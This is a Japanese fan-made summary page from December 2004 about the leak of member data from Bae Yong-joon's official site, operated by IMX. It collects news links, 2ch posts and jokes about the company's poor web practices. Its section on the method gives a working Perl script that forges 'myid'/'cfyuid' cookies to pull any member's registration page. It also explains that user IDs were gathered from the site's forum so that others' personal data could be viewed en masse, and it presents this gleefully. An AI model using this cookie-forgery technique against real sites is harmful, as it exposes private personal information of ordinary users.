IMXセキュリティホール関連まとめサイト(仮称)

　　　　　　　　　　　 ,.-ァ‐-、＿
　　　　　　　　 _,.-',ィ　ァァ　ニ≧ーヘ
　　　　　　　／　ノ / ／/,ィ// ///,ィヽ
　　　　　　r'　ノ／　/,//,ィ_ ///1ィノハ
　　　　　ノ////ィ´〃／ノ'　彡'　|ヾ　ハ
　　　　　ノ　//　川／ノ-‐‐く　,.-┴.!　ハ
　　　　　7　/　彡'＿,r_,二｀TニF二｀L　,リ　　ボゴワ　ハンディカム
　　　　 ┤　　三ノ　ヽ　二ノ　ヾ二.ノ!ハj
　　　　　フ彡'ノ='　　　　〃-:、 ,:- 、　! ノ
　　　　　　イヾ-、　　 { i-rrrrrrrァ}　}ノ　　　
　　　　　　ノハ、ーヽ　　ヽヾ='='='/　/、
　　　　＿}　ノヘ＼　＼_　　　　　,ィ'ノト-、
トップ画像とか募集中!!

ゲストブック

どっかのラジオもキタ (2004/12/27)

とくダネもキタ (2004/12/28) フルバージョンにチェンジ

NHK ニュース7キターｗ (2004/12/26)

なぜパソコンクラブなの？

個人情報抜きの手口

IMX関連サイト

その他

記事の内容に対しての苦情・質問・指摘はゲストブックまでお願いします。

どっかのラジオもキタ

音声(wave)(zip)　これも拾いました。God。

thanks to ◆VIPPER/vT. (詳しくはゲストブック)

とくダネもキタ

~~ニュース動画　これも拾いました。神です。~~
ニュース動画(フルバージョン、Xvid)　友人がキャプチャしといてくれました。神。VLCでもあれば見れるようです。

NHK ニュース7キターｗ

警察に被害届け出したって言ってたｗ

ニュース動画　さっきうｐろだで拾いました。神！

http://www3.nhk.or.jp/news/2004/12/26/d20041226000084.html (NHKのWeb)

IMX関連サイト

ペ・ヨンジュン公式サイト (http://www.yongjoon.jp/)

IMX公式サイト(ブロコリ) (http://www.brokore.com/)

共に一時閉鎖。
でも写真集とカレンダーは売ってるよ。

・その他

194 名前：番組の途中ですが名無しです[] 投稿日：04/12/26 16:33:45 ID:v8uqWvpN
“ヨン様”のＨＰ閉鎖・個人情報流出関連
http://www.nikkei.co.jp/news/shakai/20041225STXKG034825122004.html
http://www.sponichi.co.jp/entertainment/flash/KFullFlash20041225026.html
http://www.shikoku-np.co.jp/news/news.aspx?id=20041226000001
http://www.sakigake.jp/servlet/SKNEWS.NewsPack.npnews?newsid=2004122501002258&genre=lifestyle/human_interest
http://www.kahoku.co.jp/news/2004/12/2004122501002258.htm
http://kumanichi.com/news/kyodo/life/200412/20041226000001.htm
http://www.sanyo.oni.co.jp/newspack/20041225/20041225010022581.html
http://www.toonippo.co.jp/news_kyo/news/20041225010022581.asp
http://www.iwate-np.co.jp/newspack/cgi-bin/newspack.cgi?lifestyle+CN2004122501002258_1
http://www.nikkansports.com/ns/entertainment/f-et-tp0-041224-0018.html
http://www.kobe-np.co.jp/kyodonews/news/4122501002258.html
http://chuspo.chunichi.co.jp/00/hou/20041226/spon____hou_____004.shtml
http://www.tokyo-np.co.jp/00/sya/20041226/mng_____sya_____009.shtml

1 名前：番組の途中ですが名無しです[] 投稿日：04/12/26 16:21:26 ID:A19+rL3M
ペ公式ﾍﾟｰｼﾞ
http://www.yongjoon.jp/

ペ公式掲示板ｗｗｗｗｗｗｗｗ
http://www.yongjoon.jp/bae_bbs/start/board.asp

現在両方落ちてます

まとめサイト&FLASH
http://s03.2log.net/home/kkk666/archives/blog268.html
http://www.geocities.jp/baematome/
http://v.isp.2ch.net/up/0c7fa988e85c.swf
http://www.fileup.org/file/fup4094.swf
http://www.geocities.jp/imx_sec/

・個人情報抜きの手口

#!/usr/bin/perl
$|=1;
use HTTP::Request;
use LWP::UserAgent;
print 'Content-type: text/html', "\n\n";
$userid = $ARGV[0];
$request = HTTP::Request->new('GET' => 'http://www.yongjoon.jp/mypage/member1.asp');
$request -> header('User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)');
$request -> header('Referer' => 'http://www.yongjoon.jp/index.asp');
$request -> header('Accept' => '*/*');
$request -> header('Accept-Language' => 'ja');
$request -> header('Accept-Encoding' => 'gzip, deflate');
$request -> header('Connection' => 'Keep-Alive');
$request -> header('Cookie' => "myid=$userid; cfyuid=$userid;");
$ua = LWP::UserAgent->new;
$response = $ua->request($request);
print $response->content;
exit;

(Perlでのサンプルソース)

これをsec.cgiとでも名前付けて、Perlと上に書いてあるモジュールが使えるサーバーにでも置いて、
sec.cgi?useridみたいな感じで呼び出せば個人情報丸見え。

今はmember1.aspにアクセスした所で403が返ってくるが、その前はサルでも見放題だった。

つまり、http://www.yongjoon.jp/mypage/member1.aspに対して、偽装したクッキーを送ってやればいいだけだ。
（クッキーの内容は、 myid=ユーザーID; cfyuid=ユーザーID;　）
http://www.yongjoon.jp/mypage/member1.aspは、ペ公式の会員が登録情報を変更する為のページ。
公式サイトのBBSには、ユーザーID表示での書き込みしか出来ない為、そこからIDを拾って個人情報閲覧しまくりだった模様。

うはｗｗｗｗｗｗおｋｋｗｗｗｗｗｗｗｗｗｗ

・なぜパソコンクラブなの？

(現在は修正されてる)
http://www.yongjoon.jp/(ペ公式)

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=Shift-JIS">
<title>サイト一時閉鎖のお知らせ</title>
<link href="file:///D|/yongjoon/css/yongjun.css" rel="stylesheet" type="text/css">
↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑

44 名前：番組の途中ですが名無しです[] 投稿日：04/12/25 01:47:36 ID:06xfHJIw

ペヨンジュン　公式ホームページ
http://www.yongjoon.jp/

ソース開くと【<link href="file:///D|/yongjoon/css/yongjun.css" rel="stylesheet" type="text/css">】

このIMXとかいう会社は、中学校のパソコンクラブか何かか？
よくこんな状態で、『現在、セキュリティの問題点は把握されている状態』とか言えるな・・・・